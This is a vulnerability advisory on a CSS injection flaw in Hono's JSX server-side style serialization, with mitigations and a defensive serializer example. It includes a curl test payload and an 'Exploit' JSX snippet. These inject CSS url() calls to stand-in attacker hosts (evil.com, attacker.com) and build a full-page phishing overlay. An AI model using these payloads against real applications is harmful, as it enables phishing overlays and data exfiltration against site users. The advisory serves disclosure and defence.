The vulnerability stems from how the JSX renderer serializes `style` object values. During server-side rendering (SSR), untrusted input placed into a `style` object's property name or value is escaped for the HTML attribute context but not for the CSS declaration context. Characters that function as CSS declaration boundaries, such as semicolons (`;`), comment markers (`/*` and `*/`), quoted strings (`'` or `"`), and block delimiters (`{` and `}`), are perfectly valid inside an HTML attribute. This means an attacker can supply a value like `"red; color: blue; background: url(https://attacker.net/evil.css)"` which, when serialized, breaks out of the intended CSS property and injects additional arbitrary declarations into the rendered `style` attribute.
Because the injection occurs inside the `style` attribute, HTML‑attribute escaping does not stop the attack. The inserted CSS runs in the context of the victim’s page, allowing an attacker to modify layout, hide legitimate content, create phishing overlays, or trigger network requests via CSS `url()` values. JavaScript execution is not possible, but the impact on UI integrity and data exfiltration can be severe. The issue affects all versions of `hono/jsx` before the patched release 4.12.18, and any application that interpolates user‑controlled data into a JSX `style` object on the server is at risk.
DailyCVE Form
Platform: Hono JSX SSR
Version: before 4.12.18
Vulnerability: CSS injection
Severity: Medium
Date: 2026-05-09
Prediction: 2026-05-09
Analytics (What Undercode Say)
Check current Hono version:

```bash
npm list hono
```

Find vulnerable style object patterns (inline style objects in JSX/TSX sources; the `--include` globs need the `*` wildcard to match file names):

```bash
grep -rn 'style={{' --include="*.jsx" --include="*.tsx" .
```

Test CSS injection locally (the JSON body needs a matching `Content-Type` header to be parsed as JSON):

```bash
curl -X POST https://target.com/api/comment \
  -H 'Content-Type: application/json' \
  -d '{"style": "red; color: blue; background: url(https://evil.com/leak)"}'
```
Exploit

```jsx
// Attacker-controlled payload
const maliciousStyle = {
  color: "red; background: url(https://attacker.com/steal); position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 9999;"
};

// Rendered unsafely on the server
<div style={maliciousStyle}>Click here for a gift</div>
```
Protection from this CVE
- Upgrade `hono` to >= 4.12.18 immediately
- Sanitize all user input used in `style` objects: reject characters that act as CSS declaration boundaries, such as `;`, `{`, `}`, `/*`, `*/`, `'`, and `"`
- Use a safe CSS‑in‑JS library that properly escapes both the HTML attribute and the CSS declaration contexts
- Apply a strict Content Security Policy (CSP) that restricts `style-src` and `connect-src` to trusted origins
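To make the two escaping contexts concrete, here is an added example (not hono/jsx code) that models the serialization behaviour described above beside a hardened serializer that refuses declaration-boundary characters, plus a check that counts how many declarations actually land in the attribute. The `style` object shapes and the `attacker.example` host are constructed for illustration.

```javascript
// Simplified model of the advisory's bug: HTML-attribute escaping only.
// It stops attribute breakout (quotes, angle brackets) but does nothing
// about CSS declaration breakout inside the attribute value.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// camelCase JSX keys become kebab-case CSS properties.
function camelToKebab(name) {
  return name.replace(/[A-Z]/g, (c) => "-" + c.toLowerCase());
}

// Vulnerable pattern: values flow straight into the declaration list, so a
// single "color" value can smuggle in any number of extra declarations.
function unsafeStyleAttr(style) {
  const decls = Object.entries(style).map(([k, v]) => `${camelToKebab(k)}:${v}`);
  return `style="${escapeAttr(decls.join(";"))}"`;
}

// Hardened: property names are allowlisted and values are rejected if they
// contain anything that can terminate or restructure a CSS declaration.
const PROP_RE = /^[a-zA-Z][a-zA-Z0-9-]*$/;
const BAD_VALUE_RE = /[;{}"'\\]|\/\*|\*\//;

function safeStyleAttr(style) {
  const decls = [];
  for (const [k, v] of Object.entries(style)) {
    const prop = camelToKebab(k);
    if (!PROP_RE.test(prop)) throw new Error(`invalid CSS property: ${k}`);
    const value = String(v);
    if (BAD_VALUE_RE.test(value)) throw new Error(`rejected CSS value for ${prop}`);
    decls.push(`${prop}:${value}`);
  }
  return `style="${escapeAttr(decls.join(";"))}"`;
}

// Detection aid: count the declarations inside a rendered style attribute.
// More declarations than keys in the source object means injection happened.
function declarationCount(attr) {
  const inner = attr.slice('style="'.length, -1);
  return inner.split(";").filter((d) => d.trim()).length;
}
```

With one key whose value is `"red; background: url(https://attacker.example/leak)"`, `unsafeStyleAttr` yields two declarations while `safeStyleAttr` throws; benign objects serialize identically through both.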
Impact
- Visual manipulation: full‑viewport phishing overlays, hidden UI elements
- Data exfiltration: outbound requests to attacker‑controlled hosts using `url(…)`
- UI hijacking: alteration of layout, positioning, visibility, and user affordances
Sources:
Reported By: github.com